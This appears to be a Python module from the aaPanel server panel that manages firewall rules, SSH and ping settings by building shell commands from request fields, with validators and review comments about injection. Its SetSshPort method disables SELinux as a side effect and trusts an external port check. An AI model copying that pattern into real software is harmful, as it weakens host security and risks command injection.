Code Editor : firewalls_v2.py
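# coding: utf-8
# +-------------------------------------------------------------------
# | aaPanel x3
# +-------------------------------------------------------------------
# | Copyright (c) 2015-2016 aaPanel(www.aapanel.com) All rights reserved.
# +-------------------------------------------------------------------
# | Author: hwliang <hwl@aapanel.com>
# +-------------------------------------------------------------------
import sys, os, public, re, firewalld, time
from public.validate import Param


class firewalls:
    """Drive ufw, firewalld or iptables from panel requests.

    Every rule change is made by building a command line and passing it to
    ``public.ExecShell``. Request fields therefore end up inside a shell
    command, so each method validates the field with ``_is_valid_port_spec``
    or ``_is_valid_address_spec`` before any command is built.
    """
    __isFirewalld = False
    __isUfw = False
    __Obj = None

    def __init__(self):
        """Detect which firewall front end is installed and sync firewalld rules into the DB."""
        if os.path.exists('/usr/sbin/firewalld'):
            self.__isFirewalld = True
        self.__ufw = 'ufw'
        if os.path.exists('/usr/sbin/ufw'):
            self.__isUfw = True
            self.__ufw = '/usr/sbin/ufw'
        if self.__isFirewalld:
            try:
                self.__Obj = firewalld.firewalld()
                self.GetList()
            except Exception:
                # Best effort: the panel must still load when firewalld cannot be queried.
                pass

    @staticmethod
    def _is_valid_port_spec(port):
        """Return True when *port* is ``N``, ``N:M`` or ``N-M`` with every number in 1..65535.

        ``re.fullmatch`` is used instead of ``^...$`` because ``$`` also matches
        before a trailing newline, and a newline inside a shell command line
        starts a second command.
        """
        if not isinstance(port, str):
            return False
        if not re.fullmatch(r"\d{1,5}([:-]\d{1,5})?", port):
            return False
        return all(1 <= int(part) <= 65535 for part in re.split(r"[:-]", port))

    @staticmethod
    def _is_valid_address_spec(address):
        """Return True when *address* is ``IP`` or ``IP/mask`` and is safe to place in a command.

        The part before ``/`` must pass ``public.check_ip`` and consist only of
        address characters; the optional part after ``/`` must be a decimal
        prefix length or a dotted netmask. Anything else (spaces, quotes,
        ``;``, a second ``/``) is rejected.
        """
        if not isinstance(address, str):
            return False
        base, has_mask, mask = address.partition('/')
        # Character allow-list first, so the result does not depend on how strict check_ip is.
        if not re.fullmatch(r"[0-9A-Fa-f:.]+", base):
            return False
        if not public.check_ip(base):
            return False
        if not has_mask:
            return True
        return re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}|\d{1,3}", mask) is not None

    # Import the rules firewalld already has into the panel database
    def GetList(self):
        """Copy firewalld's accepted ports and dropped addresses into the ``firewall`` table.

        Rows that already exist are left alone. Any failure is ignored, so the
        method returns None in every case.
        """
        try:
            data = {}
            data['ports'] = self.__Obj.GetAcceptPortList()
            addtime = time.strftime('%Y-%m-%d %X', time.localtime())
            for entry in data['ports']:
                if not self.CheckDbExists(entry['port']):
                    public.M('firewall').add('port,ps,addtime', (entry['port'], '', addtime))
            data['iplist'] = self.__Obj.GetDropAddressList()
            for entry in data['iplist']:
                try:
                    if not self.CheckDbExists(entry['address']):
                        public.M('firewall').add('port,ps,addtime', (entry['address'], '', addtime))
                except Exception:
                    pass
        except Exception:
            pass

    # Check whether the database already has this entry
    def CheckDbExists(self, port):
        """Return the ``firewall`` row whose ``port`` column equals *port*, or False."""
        data = public.M('firewall').field('id,port,ps,addtime').select()
        for dt in data:
            if dt['port'] == port:
                return dt
        return False

    # Reload the firewall configuration
    def FirewallReload(self):
        """Ask the active firewall front end to reload its rules (commands run in the background)."""
        if self.__isUfw:
            public.ExecShell('/usr/sbin/ufw reload &')
            return
        if self.__isFirewalld:
            public.ExecShell('firewall-cmd --reload &')
        else:
            public.ExecShell('/etc/init.d/iptables save &')
            public.ExecShell('/etc/init.d/iptables restart &')

    # Get the firewall status
    def CheckFirewallStatus(self):
        """Return True when ``public.get_firewall_status()`` reports 1."""
        return public.get_firewall_status() == 1

    def SetFirewallStatus(self, get=None):
        '''
            @name Toggle the system firewall on or off
            @author hwliang<2022-01-13>
        '''
        status = not self.CheckFirewallStatus()
        status_msg = {False: 'Close', True: 'Open'}
        if self.__isUfw:
            if status:
                public.ExecShell('echo y|{} enable'.format(self.__ufw))
            else:
                public.ExecShell('echo y|{} disable'.format(self.__ufw))
        # NOTE(review): this is a second `if`, not `elif`, so on a ufw-only host the
        # iptables init commands in the `else` branch run as well. Every other method
        # in this class treats ufw as exclusive; confirm whether that is intended here.
        if self.__isFirewalld:
            if status:
                public.ExecShell('systemctl enable firewalld')
                public.ExecShell('systemctl start firewalld')
            else:
                public.ExecShell('systemctl disable firewalld')
                public.ExecShell('systemctl stop firewalld')
        else:
            if status:
                public.ExecShell("chkconfig iptables on")
                public.ExecShell('/etc/init.d/iptables start')
            else:
                public.ExecShell("chkconfig iptables off")
                public.ExecShell('/etc/init.d/iptables stop')
        public.write_log_gettext('Firewall manager', '{} system firewall!', (status_msg[status],))
        return public.return_msg_gettext(True, '{} system firewall!', (status_msg[status],))

    # Add an address to the block list
    def AddDropAddress(self, get):
        """Block ``get.port`` (an IP or IP/mask) and record it with the remark ``get.ps``.

        The whole value is validated, not only the part before ``/``: the full
        string is what gets concatenated into the shell command.
        """
        if not self.CheckFirewallStatus():
            return public.return_msg_gettext(False, public.lang("The system firewall is not open"))
        address = get.port
        if not self._is_valid_address_spec(address):
            return public.return_msg_gettext(False, public.lang("IP address you entered is illegal!"))
        ip_format = address.split('/')[0]
        if ip_format in ['0.0.0.0', '127.0.0.0', "::1"]:
            return public.return_msg_gettext(False, public.lang("Disabling this IP will cause your server to fail"))
        if public.M('firewall').where("port=?", (address,)).count() > 0:
            return public.return_msg_gettext(False, public.lang("The IP exists in block list, no need to repeat processing!"))
        if self.__isUfw:
            if public.is_ipv6(ip_format):
                public.ExecShell('{} deny from {} to any'.format(self.__ufw, address))
            else:
                public.ExecShell('{} insert 1 deny from {} to any'.format(self.__ufw, address))
        elif self.__isFirewalld:
            family = 'ipv6' if public.is_ipv6(ip_format) else 'ipv4'
            public.ExecShell(
                'firewall-cmd --permanent --add-rich-rule=\'rule family=' + family
                + ' source address="' + address + '" drop\'')
        else:
            if public.is_ipv6(ip_format):
                return public.return_msg_gettext(False, public.lang("IP address is illegal!"))
            public.ExecShell('iptables -I INPUT -s ' + address + ' -j DROP')

        public.WriteLog("TYPE_FIREWALL", 'FIREWALL_DROP_IP', (address,))
        addtime = time.strftime('%Y-%m-%d %X', time.localtime())
        # Encode the remark the same way AddAcceptPort does before it is stored.
        public.M('firewall').add('port,ps,addtime', (address, public.xssencode2(get.ps), addtime))
        self.FirewallReload()
        return public.return_msg_gettext(True, public.lang("Setup successfully!"))

    # Remove an address from the block list
    def DelDropAddress(self, get):
        """Unblock ``get.port`` and delete the ``firewall`` row ``get.id``.

        ``get.port`` is validated before use because it is concatenated into
        the shell command that removes the rule.
        """
        if not self.CheckFirewallStatus():
            return public.return_msg_gettext(False, public.lang("The system firewall is not open"))
        address = get.port
        row_id = get.id
        if not self._is_valid_address_spec(address):
            return public.return_msg_gettext(False, public.lang("IP address is illegal!"))
        ip_format = address.split('/')[0]
        if self.__isUfw:
            public.ExecShell('{} delete deny from {} to any'.format(self.__ufw, address))
        elif self.__isFirewalld:
            family = 'ipv6' if public.is_ipv6(ip_format) else 'ipv4'
            public.ExecShell(
                'firewall-cmd --permanent --remove-rich-rule=\'rule family=' + family
                + ' source address="' + address + '" drop\'')
        else:
            public.ExecShell('iptables -D INPUT -s ' + address + ' -j DROP')

        public.WriteLog("TYPE_FIREWALL", 'FIREWALL_ACCEPT_IP', (address,))
        public.M('firewall').where("id=?", (row_id,)).delete()

        self.FirewallReload()
        return public.return_msg_gettext(True, public.lang("Successfully deleted"))

    # Open a port
    def AddAcceptPort(self, get):
        """Open ``get.port`` (``N``, ``N-M`` or ``N:M``) for TCP, and for UDP unless it is in ``notudps``."""
        if not self.CheckFirewallStatus():
            return public.return_msg_gettext(False, public.lang("The system firewall is not open"))
        src_port = get.port
        get.port = get.port.replace('-', ':')
        if not self._is_valid_port_spec(get.port):
            return public.return_msg_gettext(False, public.lang("Port range must be between 22 and 65535!"))
        port = get.port
        ps = public.xssencode2(get.ps)
        is_exists = public.M('firewall').where("port=? or port=?", (port, src_port)).count()
        if is_exists:
            return public.return_msg_gettext(False, public.lang("The port exists, no need to repeat the release!"))
        notudps = ['80', '443', '8888', '888', '39000:40000', '21', '22']
        # Decide about UDP while the port is still in colon form: the firewalld branch
        # rewrites it to dash form, which would never match '39000:40000'.
        open_udp = port not in notudps
        if self.__isUfw:
            public.ExecShell('{} allow {}/tcp'.format(self.__ufw, port))
            if open_udp:
                public.ExecShell('{} allow {}/udp'.format(self.__ufw, port))
        elif self.__isFirewalld:
            port = port.replace(':', '-')
            public.ExecShell('firewall-cmd --permanent --zone=public --add-port=' + port + '/tcp')
            if open_udp:
                public.ExecShell('firewall-cmd --permanent --zone=public --add-port=' + port + '/udp')
        else:
            public.ExecShell('iptables -I INPUT -p tcp -m state --state NEW -m tcp --dport ' + port + ' -j ACCEPT')
            if open_udp:
                # The udp match needs `-p udp`; with `-p tcp` the rule is not a UDP rule.
                public.ExecShell('iptables -I INPUT -p udp -m state --state NEW -m udp --dport ' + port + ' -j ACCEPT')
        public.WriteLog("TYPE_FIREWALL", 'FIREWALL_ACCEPT_PORT', (port,))
        addtime = time.strftime('%Y-%m-%d %X', time.localtime())
        public.M('firewall').add('port,ps,addtime', (port, ps, addtime))

        self.FirewallReload()
        return public.return_msg_gettext(True, public.lang("Setup successfully!"))

    # Open a port for both TCP and UDP
    def AddAcceptPortAll(self, port, ps):
        """Open *port* for TCP and UDP without touching the database.

        Returns True on success, False when *port* is not a valid port or
        range, and a message dict when the firewall is off. *ps* is unused.
        """
        if not self.CheckFirewallStatus():
            return public.return_msg_gettext(False, public.lang("The system firewall is not open"))
        port = port.replace('-', ':')
        if not self._is_valid_port_spec(port):
            return False
        if self.__isUfw:
            public.ExecShell('{} allow {}/tcp'.format(self.__ufw, port))
            public.ExecShell('{} allow {}/udp'.format(self.__ufw, port))
        elif self.__isFirewalld:
            port = port.replace(':', '-')
            public.ExecShell('firewall-cmd --permanent --zone=public --add-port=' + port + '/tcp')
            public.ExecShell('firewall-cmd --permanent --zone=public --add-port=' + port + '/udp')
        else:
            public.ExecShell('iptables -I INPUT -p tcp -m state --state NEW -m tcp --dport ' + port + ' -j ACCEPT')
            public.ExecShell('iptables -I INPUT -p udp -m state --state NEW -m udp --dport ' + port + ' -j ACCEPT')
        return True

    # Close a port
    def DelAcceptPort(self, get):
        """Remove the allow rule for ``get.port`` and delete the ``firewall`` row ``get.id``.

        IPv6 addresses are forwarded to ``DelDropAddress``. Any other value
        must be a valid port or range, because it is concatenated into the
        shell command that removes the rule.
        """
        if not self.CheckFirewallStatus():
            return public.return_msg_gettext(False, public.lang("The system firewall is not open"))
        port = get.port
        row_id = get.id
        if public.is_ipv6(port):
            return self.DelDropAddress(get)  # an IPv6 address is a block-list entry, not a port
        if not self._is_valid_port_spec(port):
            return public.return_msg_gettext(False, public.lang("Failed to delete"))
        try:
            if (port == public.GetHost(True) or port == public.readFile('data/port.pl').strip()):
                return public.return_msg_gettext(False, public.lang("Failed,cannot delete current port of the panel"))
            if self.__isUfw:
                public.ExecShell('{} delete allow {}/tcp'.format(self.__ufw, port))
                public.ExecShell('{} delete allow {}/udp'.format(self.__ufw, port))
            elif self.__isFirewalld:
                public.ExecShell('firewall-cmd --permanent --zone=public --remove-port=' + port + '/tcp')
                public.ExecShell('firewall-cmd --permanent --zone=public --remove-port=' + port + '/udp')
            else:
                public.ExecShell('iptables -D INPUT -p tcp -m state --state NEW -m tcp --dport ' + port + ' -j ACCEPT')
                public.ExecShell('iptables -D INPUT -p udp -m state --state NEW -m udp --dport ' + port + ' -j ACCEPT')
            public.WriteLog("TYPE_FIREWALL", 'FIREWALL_DROP_PORT', (port,))
            public.M('firewall').where("id=?", (row_id,)).delete()

            self.FirewallReload()
            return public.return_msg_gettext(True, public.lang("Successfully deleted"))
        except Exception:
            return public.return_msg_gettext(False, public.lang("Failed to delete"))

    # Start or stop the SSH service
    def SetSshStatus(self, get):
        """Stop sshd when ``get['status']`` is 1, start it otherwise.

        ``act`` is always the literal 'stop' or 'start', so no request data
        reaches the shell here.
        """
        if int(get['status']) == 1:
            msg = public.get_msg_gettext('SSH service turned off')
            act = 'stop'
        else:
            msg = public.get_msg_gettext('SSH service turned on')
            act = 'start'

        # The service name and init system differ between distributions, so try every form.
        public.ExecShell("/etc/init.d/sshd " + act)
        public.ExecShell('service ssh ' + act)
        public.ExecShell("systemctl " + act + " sshd")
        public.ExecShell("systemctl " + act + " ssh")
        if act in ['start'] and not public.get_sshd_status():
            msg = 'SSHD service failed to start'
            public.WriteLog("TYPE_FIREWALL", msg)
            return public.return_message(-1, 0, msg)
        public.WriteLog("TYPE_FIREWALL", msg)
        return public.return_message(0, 0, public.lang("Setup successfully!"))

    # Toggle ping replies
    def SetPing(self, get):
        """Write ``net.ipv4.icmp_echo_ignore_all`` to /etc/sysctl.conf and apply it.

        ``get.status`` is inverted first and ends up as the literal '0' or '1'.
        Only the ``icmp_echo_ignore_all`` key is rewritten, so a neighbouring
        ``net.ipv4.icmp_echo_ignore_broadcasts`` line keeps its value.
        """
        if get.status == '1':
            get.status = '0'
        else:
            get.status = '1'
        filename = '/etc/sysctl.conf'
        conf = public.readFile(filename)
        setting = 'net.ipv4.icmp_echo_ignore_all=' + get.status
        # Leading '#' is consumed too, so a commented-out line becomes an active one.
        pattern = r"(?m)^[#\t ]*net\.ipv4\.icmp_echo_ignore_all[\t ]*=.*$"
        if re.search(pattern, conf):
            conf = re.sub(pattern, setting, conf)
        else:
            conf += "\n" + setting + "\n"

        if public.writeFile(filename, conf):
            public.ExecShell('sysctl -p')
            return public.return_message(0, 0, public.lang("SUCCESS"))
        else:
            return public.return_message(-1, 0, '<a style="color:red;">ERROR: setup failed, [sysctl.conf] not writable!</a><br>1. If [System hardening] is installed, please close it first<br>')

    # Change the SSH port
    def SetSshPort(self, get):
        """Rewrite the ``Port`` line in sshd_config, open the port and restart sshd."""
        # Validate the request parameters
        try:
            get.validate([
                Param('port').Require().Number(">=", 22).Number("<=", 65535).Xss(),
            ], [
                public.validate.trim_filter(),
            ])
        except Exception as ex:
            public.print_log("error info: {}".format(ex))
            return public.return_message(-1, 0, str(ex))

        # NOTE(review): `port` is written into sshd_config and concatenated into shell
        # commands below. That is only safe if Param.Number() rejects every value that
        # is not a plain decimal integer; confirm against public.validate.
        port = get.port
        ports = ['21', '25', '80', '443', '8080', '888', '8888', '7800']
        if port in ports:
            return public.return_message(-1, 0, public.lang("Do NOT use common default port!"))

        file = '/etc/ssh/sshd_config'
        conf = public.readFile(file)

        rep = r"#*Port\s+([0-9]+)\s*\n"
        conf = re.sub(rep, "Port " + port + "\n", conf)
        public.writeFile(file, conf)

        if self.__isFirewalld:
            public.ExecShell('firewall-cmd --permanent --zone=public --add-port=' + port + '/tcp')
            # NOTE(review): changing the SSH port switches SELinux off for the running
            # system and in /etc/selinux/config. That removes a host-wide control as a
            # side effect of a port change; labelling the new port for sshd would keep
            # SELinux enforcing. Left unchanged here because callers may rely on it.
            public.ExecShell('setenforce 0')
            public.ExecShell('sed -i "s#SELINUX=enforcing#SELINUX=disabled#" /etc/selinux/config')
            public.ExecShell("systemctl restart sshd.service")
        elif self.__isUfw:
            public.ExecShell('{} allow {}/tcp'.format(self.__ufw, port))
            public.ExecShell("service ssh restart")
        else:
            public.ExecShell('iptables -I INPUT -p tcp -m state --state NEW -m tcp --dport ' + port + ' -j ACCEPT')
            public.ExecShell("/etc/init.d/sshd restart")

        self.FirewallReload()
        public.M('firewall').where("ps=? or ps=? or port=?", ('SSH remote management service', 'SSH remote service', port)).delete()
        public.M('firewall').add('port,ps,addtime', (port, 'SSH remote service', time.strftime('%Y-%m-%d %X', time.localtime())))
        public.WriteLog("TYPE_FIREWALL", "FIREWALL_SSH_PORT", (port,))
        return public.return_message(0, 0, public.lang("Setup successfully!"))

    # Get SSH information
    def GetSshInfo(self, get):
        """Return the sshd port, sshd status, ping setting and firewall status in one message."""
        port = public.get_sshd_port()
        status = public.get_sshd_status()

        isPing = True
        try:
            file = '/etc/sysctl.conf'
            conf = public.readFile(file)
            rep = r"#*net\.ipv4\.icmp_echo_ignore_all\s*=\s*([0-9]+)"
            tmp = re.search(rep, conf).groups(0)[0]
            if tmp == '1':
                isPing = False
        except Exception:
            # No such line, or the file could not be read: report ping as enabled.
            isPing = True

        data = {}
        data['port'] = port
        data['status'] = status
        data['ping'] = isPing
        data['firewall_status'] = self.CheckFirewallStatus()
        return public.return_message(0, 0, data)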